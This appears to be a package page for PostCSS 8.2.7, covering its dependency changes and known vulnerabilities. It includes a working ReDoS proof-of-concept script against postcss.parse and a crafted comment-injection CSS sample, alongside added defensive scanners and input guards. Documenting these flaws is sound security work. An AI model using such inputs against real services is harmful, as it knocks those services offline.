PostCSS version 8.2.7 represents a minor update to the popular CSS transformation tool, building upon the existing functionality of version 8.2.6. Both versions maintain the core purpose of empowering developers to manipulate CSS with JavaScript plugins, enabling tasks like vendor prefixing, future CSS syntax adoption, and code optimization. They share the essential dependencies, including nanoid for generating unique IDs and source-map for debugging. Crucially, both are released under the permissive MIT license and actively supported by the community through Open Collective funding.
The primary difference between the two lies in the updated colorette dependency. PostCSS 8.2.6 uses colorette version 1.2.1, while 8.2.7 upgrades this dependency to version 1.2.2. Although seemingly small, this update likely incorporates bug fixes or minor feature enhancements within the colorette package, potentially affecting the appearance or behavior of colored terminal output produced during PostCSS processing. Developers who rely on terminal output for debugging or build processes may notice subtle changes. Furthermore, the unpacked size of the package has increased slightly in 8.2.7, probably as a result of this dependency update.
PostCSS, in general, is vital for modern web development workflows. Its plugin architecture makes it adaptable to a wide range of CSS-related tasks. Whether you need to automate repetitive tasks, stay ahead of CSS standards, or improve code quality, PostCSS provides a robust foundation that integrates readily into existing build systems using tools like webpack, parcel, and gulp. Regular updates, like this minor version bump, help to ensure the robustness and compatibility of existing developer workflows.
All vulnerabilities affecting version 8.2.7 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
// Builds a string that repeats the annotation prefix n times without ever
// closing the comment, which is the input shape that triggers the backtracking.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}
// Warm-up parse of a well-formed annotation, then parse ever longer inputs and
// report the time each takes; superlinear growth in time is the ReDoS.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
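The following is an added example, not code from PostCSS or from the advisory, showing the defensive side of the sub-pattern quoted above: a linear-time scanner for source map annotation comments and a guard that bounds untrusted CSS before an unpatched parser sees it. The regex GREEDY_ANNOTATION is a simplified, constructed stand-in for the vulnerable shape (it is not the exact expression from lib/previous-map.js), and every function name, limit and sample input here is this example's own.

```javascript
// Added example, not code from PostCSS or from the advisory. Function names,
// limits and sample inputs are this example's own.

// Simplified, constructed version of the vulnerable shape: a greedy `(.*)`
// that must still be followed by the comment terminator. When the input
// repeats the annotation prefix and never closes the comment, the engine
// retries every end position for every start position, so work grows
// superlinearly. It is only ever applied to tiny inputs here.
const GREEDY_ANNOTATION = /\/\*\s*# sourceMappingURL=(.*)\*\//;

function greedyCapture(css) {
  const m = GREEDY_ANNOTATION.exec(css);
  return m ? m[1].trim() : null;
}

// Count substring occurrences with indexOf: each character is visited once.
function countOccurrences(text, needle) {
  let count = 0;
  let pos = text.indexOf(needle);
  while (pos !== -1) {
    count++;
    pos = text.indexOf(needle, pos + needle.length);
  }
  return count;
}

// Walk the comments in order; collect every `/*# sourceMappingURL=...*/`
// annotation and report whether the input ends inside an unclosed comment.
// No backtracking: the scan position only ever moves forward.
function findSourceMapAnnotations(css) {
  const annotations = [];
  let pos = 0;
  for (;;) {
    const start = css.indexOf('/*', pos);
    if (start === -1) return { annotations, unterminatedComment: false };
    const end = css.indexOf('*/', start + 2);
    if (end === -1) return { annotations, unterminatedComment: true };
    const body = css.slice(start + 2, end).trim();
    if (body.startsWith('#')) {
      const rest = body.slice(1).trim();
      if (rest.startsWith('sourceMappingURL=')) {
        annotations.push(rest.slice('sourceMappingURL='.length).trim());
      }
    }
    pos = end + 2;
  }
}

// Gate untrusted CSS before an unpatched PostCSS parses it: bound the size,
// bound the number of annotation prefixes (the attack repeats them), and
// refuse input that ends inside a comment. The default limits are illustrative.
function guardUntrustedCss(css, { maxBytes = 1000000, maxAnnotations = 1 } = {}) {
  if (css.length > maxBytes) {
    return { ok: false, reason: 'input exceeds size limit' };
  }
  if (countOccurrences(css, 'sourceMappingURL=') > maxAnnotations) {
    return { ok: false, reason: 'too many source map annotations' };
  }
  const scan = findSourceMapAnnotations(css);
  if (scan.unterminatedComment) {
    return { ok: false, reason: 'unterminated comment' };
  }
  const n = scan.annotations.length;
  return { ok: true, sourceMapURL: n ? scan.annotations[n - 1] : null };
}

// Constructed inputs: a benign stylesheet with two annotations, and a tiny
// copy of the advisory's attack shape (repeated prefix, comment never closed).
const BENIGN = 'a{}/*# sourceMappingURL=a.map */ b{} /*# sourceMappingURL=b.map */';
const ATTACK_SHAPE = 'a{}' + '/*# sourceMappingURL='.repeat(3) + '!';

console.log(greedyCapture(BENIGN));             // greedy capture spills across both comments
console.log(findSourceMapAnnotations(BENIGN));  // { annotations: ['a.map', 'b.map'], ... }
console.log(guardUntrustedCss(ATTACK_SHAPE));   // rejected before any parser runs
```

Two points are worth noting. On the benign input the greedy capture is not only slow in the worst case but also wrong: it runs to the last `*/` and swallows the second comment, whereas the forward scan returns each annotation separately. And the guard does not try to recognise the attack by its annotations, since an unclosed comment yields none; it counts the raw prefix occurrences and refuses unterminated comments, which is what an allow-list in front of a vulnerable version needs.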
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.
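As an added example (not PostCSS code and not part of the advisory), the preprocessing a linter can place in front of CSS received from an untrusted source while it still runs a PostCSS release before 8.4.31: detect bare carriage returns, the character the advisory's sample relies on, and either normalise line endings or reject the input. The fixed version 8.4.31 is taken from the text above; the function names, the version comparison and the sample inputs are this example's own assumptions.

```javascript
// Added example, not code from PostCSS. Function names and policy are this
// example's own; the fixed version number comes from the advisory text.

const FIXED_VERSION = [8, 4, 31]; // advisory: issue fixed in PostCSS 8.4.31

// Numeric major.minor.patch comparison; a prerelease suffix is ignored.
function parseVersion(v) {
  return v.split('-')[0].split('.').map((n) => parseInt(n, 10) || 0);
}

// True when the given PostCSS version predates the fix.
function postcssAffectedByCrIssue(version) {
  const parts = parseVersion(version);
  for (let i = 0; i < 3; i++) {
    const have = parts[i] || 0;
    const fixed = FIXED_VERSION[i];
    if (have !== fixed) return have < fixed;
  }
  return false;
}

// Offsets of every lone \r, i.e. a carriage return not followed by \n.
// CRLF line endings are ordinary and are left alone.
function findBareCarriageReturns(css) {
  const positions = [];
  for (let i = 0; i < css.length; i++) {
    if (css[i] === '\r' && css[i + 1] !== '\n') positions.push(i);
  }
  return positions;
}

// Canonicalise line endings so the tokenizer sees exactly one convention.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Gate untrusted CSS: with a vulnerable PostCSS and mode 'reject', refuse
// input containing bare \r; otherwise normalise it. When no version is
// supplied the code assumes the worst case and treats PostCSS as vulnerable.
function prepareUntrustedCss(css, { postcssVersion, mode = 'normalize' } = {}) {
  const bare = findBareCarriageReturns(css);
  const vulnerable = postcssVersion ? postcssAffectedByCrIssue(postcssVersion) : true;
  if (bare.length === 0) {
    return { ok: true, css, normalized: false };
  }
  if (mode === 'reject' && vulnerable) {
    return { ok: false, reason: 'bare carriage return at offsets ' + bare.join(',') };
  }
  return { ok: true, css: normalizeLineEndings(css), normalized: true };
}

// Constructed inputs: the advisory's sample rule and a harmless CRLF file.
const SAMPLE = '@font-face{ font:(\r/*);}';
const CRLF_FILE = 'a{color:red}\r\nb{color:blue}\r\n';

console.log(findBareCarriageReturns(SAMPLE));                         // [18]
console.log(prepareUntrustedCss(SAMPLE, { postcssVersion: '8.2.7', mode: 'reject' }));
console.log(prepareUntrustedCss(CRLF_FILE, { postcssVersion: '8.2.7', mode: 'reject' }));
```

The version on this page, 8.2.7, is before 8.4.31 and so falls on the vulnerable side of the check. Normalising rather than rejecting is the less disruptive policy for a linter, but the rejecting mode records where the bare carriage returns were, which is the evidence a reviewer wants when deciding whether a stylesheet was crafted.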